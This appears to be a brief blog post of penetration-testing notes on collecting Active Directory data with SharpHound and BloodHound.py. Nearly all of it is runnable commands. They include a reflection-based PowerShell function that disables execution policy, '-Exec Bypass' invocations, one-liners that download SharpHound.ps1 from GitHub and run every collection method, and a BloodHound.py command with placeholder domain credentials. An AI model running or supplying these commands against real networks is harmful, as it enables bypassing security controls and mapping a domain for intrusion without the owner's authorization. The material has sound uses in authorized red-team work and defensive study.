Collecting data using SharpHound - 17-09-2018
stop the execution policy
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
-------------------------------------------------------------------------------------------------------------------------'Two liner'
powershell.exe -Exec Bypass
powershell -Command "[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1','SharpHound.ps1')"; Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All
------------------------------------------------------------------------------------------------------------------------
"Four Liner"
powershell.exe -Exec Bypass
powershell -Command "[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls, ssl3'; (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1','SharpHound.ps1')"
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
------------------------------------------------------------------------------------------------------------------------
powershell.exe -Exec Bypass
Manually download - https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
=====================================================================
Collection Method using Python directly from a Linux box - no need for powershell.
git clone https://github.com/fox-it/BloodHound.py.git
./BloodHound.py/bloodhound.py -c All,LoggedOn -d evilcorp.local -dc 1.1.1.1 -u user -p 'password' --dns-tcp
=====================================================================
No comments:
Post a Comment